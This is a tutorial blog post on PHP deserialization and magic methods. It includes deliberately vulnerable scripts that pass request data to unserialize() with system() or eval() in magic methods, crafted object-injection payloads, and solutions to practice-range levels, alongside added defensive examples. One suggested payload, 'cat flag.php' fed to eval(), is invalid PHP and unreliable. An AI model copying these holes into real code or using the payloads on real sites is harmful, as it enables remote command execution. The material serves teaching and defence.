PHP deserialization & Magic method
2022-06-22 13:14:00 【Boring knowledge】
What are serialization and deserialization

Serialization: converting an object (or array) into a string
Deserialization: converting that string back into an object
A simple way to picture it:
Serializing 15 gives 5+5+5: the three 5s still add up to the same 15, nothing is lost.
Deserializing 5+5+5 gives 15 again.
So serialization splits an object into several pieces,
and deserialization reassembles those pieces into the object.
serialize() // convert an object to a string
unserialize() // restore an object from a string
PHP magic methods 【 key point - memorize these 】
__construct(): // constructor; called automatically when an object is created with new
__destruct(): // destructor; called automatically when an object is destroyed
__wakeup(): // called automatically by unserialize()
__invoke(): // called automatically when an object is used as if it were a function
__call(): // triggered when an inaccessible method is called in object context
__callStatic(): // triggered when an inaccessible method is called in static context
__get(): // triggered when reading an inaccessible property
__set(): // triggered when writing to an inaccessible property
__isset(): // triggered when isset() or empty() is called on an inaccessible property
__unset(): // triggered when unset() is called on an inaccessible property
__toString(): // triggered when an object is used as a string
__sleep(): // serialize() checks whether the class defines __sleep(); if it does, that method is called first and returns the names of the properties to serialize
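The list above says when each magic method fires; the script below, an added example that is not part of the original post, puts all of them in one class and drives the object through new, serialize(), unserialize(), string use, a function-style call and end of script, so the trigger order can be read off the output. The class name Lifecycle and its property are assumptions of the example. The point that matters for the rest of this post is visible in the middle: unserialize() calls __wakeup() but never __construct(), and __destruct() fires for every object once the script ends.

```php
<?php
// Added example (not code from the original post): which magic methods fire,
// and in what order, across an object's life.
class Lifecycle
{
    public $name = 'demo';

    public function __construct()  { echo "__construct\n"; }
    public function __destruct()   { echo "__destruct\n"; }
    public function __sleep()      { echo "__sleep\n"; return ['name']; } // names of properties to keep
    public function __wakeup()     { echo "__wakeup\n"; }
    public function __toString()   { echo "__toString\n"; return $this->name; }
    public function __invoke()     { echo "__invoke\n"; }
    public function __get($p)      { echo "__get($p)\n"; return null; }
    public function __set($p, $v)  { echo "__set($p)\n"; }
    public function __call($m, $a) { echo "__call($m)\n"; }
}

echo "--- new ---\n";
$obj = new Lifecycle();          // __construct
echo "--- serialize ---\n";
$s = serialize($obj);            // __sleep
echo "--- unserialize ---\n";
$copy = unserialize($s);         // __wakeup, but NOT __construct
echo "--- string context ---\n";
echo $copy, "\n";                // __toString
echo "--- call as function ---\n";
$copy();                         // __invoke
echo "--- inaccessible property / undefined method ---\n";
$copy->missing = 1;              // __set (property is not declared)
$copy->missing;                  // __get (__set did not create it)
$copy->nothing();                // __call
echo "--- end of script ---\n";  // __destruct now runs twice: once for $obj, once for $copy
```

Run it from the command line with php and compare the output with the list above; the two __destruct lines at the very end are the behaviour the later examples rely on.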
Serialization vulnerability demo
<?php
// class defines a class; think of it as the blueprint for an object. The format is: class Name { properties and methods of the object }
// demotest is the class name
class demotest{
// public means the property or method is visible from outside the class.
// This is also the usual way of declaring members in object-oriented languages.
// public: visible to all code [it means visible to other code, not something you can see in the browser with F12]
// protected: visible inside the object and inside its child classes
// private: visible only inside the class itself (not in child classes, i.e. private properties and methods are not inherited)
public $name='odw';// name = odw
public $max='man';// gender = male
public $age='18';// age = 18. If 18 is written without quotes it is an int, and the output becomes i:18
}
$example=new demotest();// instantiation: new creates an object of the class, and the object is assigned to $example
$s=serialize($example);// serialize() turns the object into a string; the format is serialize(object), and the result is assigned to $s
echo $s.'<br>';
// finally, output the serialized object
?>

serialize : Object to string
After serialization, a string is formed
O:8:"demotest":3:{s:4:"name";s:3:"odw";s:3:"max";s:3:"man";s:3:"age";s:2:"18";}
Explanation
O:8:"demotest":3:{s:4:"name";s:3:"odw";s:3:"max";s:3:"man";s:3:"age";s:2:"18";}
1. O: short for object
2. 8: the length of the class name; demotest is 8 characters
3. demotest: the class name
4. 3: the number of members in the object; demotest has three public properties
5. s: short for string (string type)
6. 4: the length of the first property name; the first property is $name, so the length is 4
7. name: the name of the first property
8. s: string type
9. 3: the length of the first property's value; $name='odw' is three letters, so the length is 3
10. odw: the value of the first property, $name='odw'
11. s: string type
12. 3: the length of the second property name; the second property is $max, so the length is 3
13. max: the name of the second property
14. s: string type
15. 3: the length of the second property's value; $max='man' is three letters, so the length is 3
16. man: the value of the second property, $max='man'
17. s: string type
18. 3: the length of the third property name; the third property is $age, so the length is 3
19. age: the name of the third property
20. s: string type
21. 2: the length of the third property's value; $age='18' is two characters, so the length is 2
22. 18: the value of the third property, $age='18'

The first serialization security issue
<?php
// class defines a class named A
class A{
// public: accessible from outside the class
public $var='echo test';// a property $var whose value is 'echo test'
public function test(){
// function defines a method; this one is named test
echo $this->var;// simply outputs $var
}
// A quick way to spot a magic method: look for the leading double underscore, as in __destruct()
// __destruct(): destructor, called automatically when the object is destroyed
public function __destruct(){
echo 'x'.'<br>';
}
// Now __construct(): the constructor, called automatically when the object is created with new
// i.e. new A() triggers this magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
$a=new A();
?>

Why does it output
__construct and x?
First, recall the trigger conditions of the two magic methods:
__construct(): // constructor, called automatically when the object is created with new
__destruct(): // destructor, called automatically when the object is destroyed
The first fires when the object is created with new.
The second fires when the object is destroyed.
Why did the second fire when we never explicitly destroyed the object? Because when the script ends, every object still alive is destroyed automatically,
so as long as the class defines __destruct(), that method runs once the script has finished with the object.
The second serialization security issue
<?php
// class defines a class named A
class A{
// public: accessible from outside the class
public $var='echo test';// a property $var whose value is 'echo test'
public function test(){
// function defines a method; this one is named test
echo $this->var;// simply outputs $var
}
// A quick way to spot a magic method: look for the leading double underscore, as in __destruct()
public function __destruct(){
echo 'x'.'<br>';
}
// Now __construct(): the constructor, called automatically when the object is created with new
// i.e. new A() triggers this magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
// No method call is needed: creating the object is enough to trigger a magic method
$a=new A();// triggers __construct
echo serialize($a).'<br>';
?>
Much like the first one, with the serialized string added to the output:
O:1:"A":1:{s:3:"var";s:9:"echo test";}

The third serialization security issue
<?php
// class defines a class named A
class A{
// public: accessible from outside the class
public $var='echo test';// a property $var whose value is 'echo test'
public function test(){
// function defines a method; this one is named test
echo $this->var;// simply outputs $var
}
// A quick way to spot a magic method: look for the leading double underscore, as in __destruct()
public function __destruct(){
echo 'x'.'<br>';
}
// Now __construct(): the constructor, called automatically when the object is created with new
// i.e. new A() triggers this magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
$t=unserialize($_GET['x']);// unserialize() deserializes the string taken from the x parameter
?>
When x=O:1:"A":1:{s:3:"var";s:9:"echo test";} is passed in and deserialized,

the output is x.

Why?
It is simple, and the same as the 15 versus 5+5+5 analogy earlier:
the serialized form of object A is O:1:"A":1:{s:3:"var";s:9:"echo test";}
so deserializing O:1:"A":1:{s:3:"var";s:9:"echo test";} recreates an object of class A.
Once deserialization completes and the script ends, the object is destroyed automatically, which satisfies the trigger condition of the magic method __destruct(). Note that __construct is not printed this time: unserialize() rebuilds the object from the string without calling the constructor.
<?php
// class defines a class named A
class A{
// public: accessible from outside the class
public $var='echo test';// a property $var whose value is 'echo test'
public function test(){
// function defines a method; this one is named test
echo $this->var;// simply outputs $var
}
// A quick way to spot a magic method: look for the leading double underscore, as in __destruct()
public function __destruct(){
echo 'x'.'<br>';
}
// Now __construct(): the constructor, called automatically when the object is created with new
// i.e. new A() triggers this magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
$t=unserialize($_GET['x']);
// $t is now the deserialized object, so the call $t->test() below runs as well
$t->test();
?>
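The line $t=unserialize($_GET['x']) lets the request decide which class is instantiated, and that is the whole problem. The script below is an added example, not code from the original post, showing the same pattern next to three defensive alternatives: the allowed_classes option of unserialize() (PHP 7.0 and later), an HMAC check so that only strings the server itself produced are ever deserialized, and json_decode() for plain key/value state. The class Sentinel, the functions sealSerialized()/openSerialized() and the APP_KEY placeholder are assumptions of the example; Sentinel stands in for class A, but its destructor only prints a marker.

```php
<?php
// Added example; not from the original post. Sentinel mirrors class A above
// (a public property read by __destruct), without running any command.
class Sentinel
{
    public $cmd = 'ipconfig';
    public function __destruct() { echo "  !! __destruct ran for Sentinel (cmd={$this->cmd})\n"; }
}

// Constructed input, equivalent to the x= parameter used in the post.
$untrusted = 'O:8:"Sentinel":1:{s:3:"cmd";s:8:"ipconfig";}';

// 1. The pattern from the post: the string chooses the class, so __destruct runs.
echo "1. unserialize(\$_GET['x']) as in the post:\n";
$t = unserialize($untrusted);
unset($t); // drops the last reference, so __destruct fires here instead of at script end

// 2. allowed_classes => false: objects come back as __PHP_Incomplete_Class, a
//    placeholder with no methods, so no magic method of Sentinel ever runs.
echo "2. allowed_classes => false:\n";
$t = unserialize($untrusted, ['allowed_classes' => false]);
echo "  got ", get_class($t), "\n";
unset($t); // nothing is printed: there is no Sentinel object to destroy

// 3. Accept only blobs the server produced: verify an HMAC before unserialize()
//    sees the data, so a string the client wrote itself is rejected up front.
const APP_KEY = 'replace-with-a-random-secret'; // placeholder, not a real key

function sealSerialized($value, string $key): string
{
    $blob = serialize($value);
    return hash_hmac('sha256', $blob, $key) . '.' . $blob;
}

function openSerialized(string $sealed, string $key, array $allowed)
{
    [$mac, $blob] = explode('.', $sealed, 2) + [null, null];
    if ($blob === null || !hash_equals(hash_hmac('sha256', $blob, $key), $mac)) {
        return null; // tampered with or not ours: never reaches unserialize()
    }
    return unserialize($blob, ['allowed_classes' => $allowed]);
}

echo "3. HMAC-sealed blob:\n";
$sealed = sealSerialized(['user' => 'alice', 'role' => 'viewer'], APP_KEY);
var_dump(openSerialized($sealed, APP_KEY, []) !== null);   // bool(true): our own data
$forged = hash_hmac('sha256', 'x', 'wrong-key') . '.' . $untrusted;
var_dump(openSerialized($forged, APP_KEY, []));           // NULL: rejected before unserialize()

// 4. When the data is only key/value state, json_decode() needs no class at all.
echo "4. json_decode():\n";
var_dump(json_decode('{"user":"alice","role":"viewer"}', true));
```

Option 2 is the smallest change to existing code, but note that allowed_classes only controls which classes are instantiated; if the application itself needs objects back, pass an explicit array of class names rather than true, and keep option 3 in front of it so unknown input never reaches the parser.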
The fourth serialization security issue
<?php
// class defines a class named A
class A{
// public: accessible from outside the class
public $var='echo test';// a property $var whose value is 'echo test'
public function test(){
// function defines a method; this one is named test
echo $this->var;// simply outputs $var
}
// A quick way to spot a magic method: look for the leading double underscore, as in __destruct()
public function __destruct(){
echo 'x'.'<br>';
}
// Now __construct(): the constructor, called automatically when the object is created with new
// i.e. new A() triggers this magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';// __toString(): triggered when the object is used as a string
}
}
$a=new A();// triggers __construct
// echo $a; uses the object in string context, which triggers the magic method __toString()
// echo '$a'; with single quotes prints the literal text $a (no interpolation), so __toString() is not triggered
echo $a;// triggers __toString
?>


From here it is easy to see how this becomes exploitable.
Vulnerability example 1
<?php
// class defines a class named A
class A{
// public: accessible from outside the class
public $var='echo test';// a property $var whose value is 'echo test'
public function test(){
// function defines a method; this one is named test
echo $this->var;// simply outputs $var
}
// A quick way to spot a magic method: look for the leading double underscore, as in __destruct()
public function __destruct(){
system('ipconfig');// changed to system(), which runs the ipconfig command
}
// Now __construct(): the constructor, called automatically when the object is created with new
// i.e. new A() triggers this magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
// No method call is needed: creating the object is enough to trigger a magic method
$a=new A();// triggers __construct
?>

Vulnerability example 2
<?php
// class defines a class named A
class A{
// public: accessible from outside the class
public $cmd='ipconfig';
public function test(){
// function defines a method; this one is named test
echo $this->cmd;// simply outputs $cmd
}
// A quick way to spot a magic method: look for the leading double underscore, as in __destruct()
public function __destruct(){
system($this->cmd);// runs $cmd; the value of $cmd is ipconfig, so this runs ipconfig
}
// Now __construct(): the constructor, called automatically when the object is created with new
// i.e. new A() triggers this magic method
//$a=new A();
public function __construct(){
echo '__construct'.'<br>';
}
public function __toString(){
return '__toString'.'<br>';
}
}
// No method call is needed: creating the object is enough to trigger a magic method
$a=new A();// triggers __construct
?>

Vulnerability example 3
<?php
class A{
public $cmd='ipconfig';
public function __destruct()
{
system($this->cmd);
}
public function __construct()
{
echo '123'.'<br>';
}
}
// No function call and no new are needed: unserialize() creates the object,
// and the magic method reads whatever value the property was given in the string
unserialize($_GET['x']);
?>
This time we construct the serialized string ourselves and let the site deserialize it.
Build it piece by piece:
1
O: short for object
2
1: the length of the class name A is 1
3
A: the class name
4
1: there is one property in the object
5
s: string type
6
3: the first property is named cmd, three letters
7
cmd: the name of the first property
8
s: string type; this one types the property value, the previous s typed the property name
9
8: the length of the property value
10
ipconfig: the value, i.e. $cmd='ipconfig'
Putting the pieces together gives
O:1:"A":1:{s:3:"cmd";s:8:"ipconfig";}

Now try changing ipconfig to ping www.baidu.com:
O:1:"A":1:{s:3:"cmd";s:18:"ping www.baidu.com";}
Spaces and dots each count as one character of the length.
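Every number in the string is a byte count, and unserialize() rejects the whole string as soon as one of them is wrong. The walker below is an added example, not code from the original post, and serves both the 22-step breakdown of the demotest string earlier and the length note just above: it reads the subset of the format used in this post (O for objects, s for strings, i for integers), logs each token with its declared length, and stops at the first place where a declared length or member count does not match the bytes that follow. The class name SerializedWalker and the three sample strings are constructed for the example; it needs PHP 7.4 or later for the typed properties.

```php
<?php
// Added example; not code from the original post. Checks the lengths and member
// counts inside a serialize()-format string before anything is deserialized.
final class SerializedWalker
{
    private string $data;
    private int $pos = 0;
    public array $log = [];

    public function __construct(string $data) { $this->data = $data; }

    // true when the whole string is consistent, false at the first mismatch
    public function check(): bool
    {
        try {
            $this->value(0);
            if ($this->pos !== strlen($this->data)) {
                throw new RuntimeException("trailing data at offset {$this->pos}");
            }
            return true;
        } catch (RuntimeException $e) {
            $this->log[] = 'ERROR: ' . $e->getMessage();
            return false;
        }
    }

    private function value(int $depth): void
    {
        $pad  = str_repeat('  ', $depth);
        $type = $this->data[$this->pos] ?? '';
        switch ($type) {
            case 's': // s:<len>:"<bytes>";
                $this->take('s:');
                $len = $this->int(':');
                $this->take('"');
                $str = substr($this->data, $this->pos, $len);
                $this->pos += $len;
                $this->take('";'); // a wrong <len> is caught here: '";' is not at the new offset
                $this->log[] = "{$pad}string len=$len value=\"$str\"";
                return;
            case 'i': // i:<digits>;
                $this->take('i:');
                $n = $this->int(';');
                $this->log[] = "{$pad}int $n";
                return;
            case 'O': // O:<len>:"<class>":<count>:{ (name value)* }
                $this->take('O:');
                $len = $this->int(':');
                $this->take('"');
                $class = substr($this->data, $this->pos, $len);
                $this->pos += $len;
                $this->take('":');
                $count = $this->int(':');
                $this->take('{');
                $this->log[] = "{$pad}object class=\"$class\" (name len=$len) members=$count";
                for ($i = 0; $i < $count; $i++) {
                    $this->value($depth + 1); // property name
                    $this->value($depth + 1); // property value
                }
                $this->take('}');
                return;
            default:
                throw new RuntimeException("unsupported or missing type '$type' at offset {$this->pos}");
        }
    }

    // consume an exact literal, or fail with the offset where the mismatch was found
    private function take(string $lit): void
    {
        if (substr($this->data, $this->pos, strlen($lit)) !== $lit) {
            throw new RuntimeException("expected '$lit' at offset {$this->pos}, found '"
                . substr($this->data, $this->pos, strlen($lit)) . "'");
        }
        $this->pos += strlen($lit);
    }

    // read a decimal number up to the given terminator
    private function int(string $terminator): int
    {
        $end = strpos($this->data, $terminator, $this->pos);
        if ($end === false) throw new RuntimeException("no '$terminator' after offset {$this->pos}");
        $digits = substr($this->data, $this->pos, $end - $this->pos);
        if (!preg_match('/^-?\d+$/', $digits)) throw new RuntimeException("bad number '$digits' at offset {$this->pos}");
        $this->pos = $end + strlen($terminator);
        return (int) $digits;
    }
}

// Constructed inputs: the string from the post, and two deliberately broken copies.
$samples = [
    'O:1:"A":1:{s:3:"cmd";s:8:"ipconfig";}', // consistent
    'O:1:"A":1:{s:3:"cmd";s:7:"ipconfig";}', // value length off by one
    'O:1:"A":3:{s:3:"cmd";s:8:"ipconfig";}', // member count says 3, only 1 present
];
foreach ($samples as $s) {
    $w = new SerializedWalker($s);
    $ok = $w->check();
    echo $s, "\n  => ", $ok ? 'consistent' : 'inconsistent', "\n  ", implode("\n  ", $w->log), "\n";
}
```

The second sample fails at the closing '";' because only seven bytes were skipped, and the third fails when the walker looks for a third member and finds '}' instead. PHP's own unserialize() returns false on both with an E_NOTICE, which is why the member count in a hand-built string has to match the number of properties exactly.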

Practice range
https://github.com/fine-1/php-SER-libs

Level 1
<?php
highlight_file(__FILE__);
class a{
var $act;
function action(){
eval($this->act);
}
}
$a=unserialize($_GET['flag']);// deserializes the data taken from the flag parameter
$a->action();// calls action() on the deserialized object $a
?>
We need to construct the string ourselves:
O:1:"a":1:{s:3:"act";s:24:"show_source('flag.php');";}

show_source highlights the contents of flag.php.
If you don't want the highlighted view of flag.php,
cat flag.php works too:
O:1:"a":1:{s:3:"act";s:12:"cat flag.php";}

Level 2

This level is relatively simple.
<?php
highlight_file(__FILE__);
include("flag.php");
class mylogin{
var $user;
var $pass;
function __construct($user,$pass){
$this->user=$user;
$this->pass=$pass;
}
function login(){
if ($this->user=="daydream" and $this->pass=="ok"){
return 1;
// it is enough to deserialize an object with user=="daydream" and pass=="ok"
}
}
}
$a=unserialize($_GET['param']);
if($a->login())
{
echo $flag;
}
?>
O:7:"mylogin":2:{s:4:"user";s:8:"daydream";s:4:"pass";s:2:"ok";}
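Every payload in this post arrives as a query parameter (x, flag, param) whose value starts with the O:<len>:"<class>":<count>:{ header explained earlier, which makes it easy to spot in access logs. The function below is an added example, not code from the original post, that pulls the query string out of combined-format log lines, decodes each parameter and reports any value that carries that header together with the class it names. The three log lines are constructed for the example (the first and third carry the URL-encoded strings from this post); findSerializedObjects() is an assumed name.

```php
<?php
// Added example; not code from the original post. Flags query parameters whose
// decoded value is a PHP serialized object, as seen in the x=, flag= and param=
// requests in this post. Only GET parameters are visible in an access log;
// POST bodies need the application's own logging.
function findSerializedObjects(string $logLine): array
{
    // request target from a combined-format line: "GET /path?query HTTP/1.1"
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $logLine, $m)) {
        return [];
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if ($query === null || $query === false) {
        return [];
    }
    parse_str($query, $params); // percent-decodes every value
    $hits = [];
    foreach ($params as $name => $value) {
        if (!is_string($value)) {
            continue; // nested array parameters are not serialized objects
        }
        // O:<len>:"<class>":<count>:{  -- the object header described in the post
        if (preg_match('/^O:\d+:"([^"]+)":\d+:\{/', $value, $h)) {
            $hits[] = ['param' => $name, 'class' => $h[1]];
        }
    }
    return $hits;
}

// Constructed log lines for the example.
$lines = [
    '203.0.113.7 - - [22/Jun/2022:13:14:00 +0800] "GET /demo.php?x=O%3A1%3A%22A%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A8%3A%22ipconfig%22%3B%7D HTTP/1.1" 200 51',
    '203.0.113.7 - - [22/Jun/2022:13:14:05 +0800] "GET /index.php?page=2&sort=name HTTP/1.1" 200 1024',
    '198.51.100.9 - - [22/Jun/2022:13:15:42 +0800] "GET /login.php?param=O%3A7%3A%22mylogin%22%3A2%3A%7Bs%3A4%3A%22user%22%3Bs%3A8%3A%22daydream%22%3Bs%3A4%3A%22pass%22%3Bs%3A2%3A%22ok%22%3B%7D HTTP/1.1" 200 77',
];

foreach ($lines as $n => $line) {
    $hits = findSerializedObjects($line);
    if ($hits === []) {
        echo "line $n: no serialized object\n";
        continue;
    }
    foreach ($hits as $hit) {
        echo "line $n: parameter '{$hit['param']}' carries a serialized object of class {$hit['class']}\n";
    }
}
```

Lines 0 and 2 are reported with classes A and mylogin; line 1 is clean. The class name in the hit is the useful field for triage: a class the application never serializes itself (here A, or anything with a __destruct or __wakeup that touches system(), eval() or files) is the case to investigate first.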
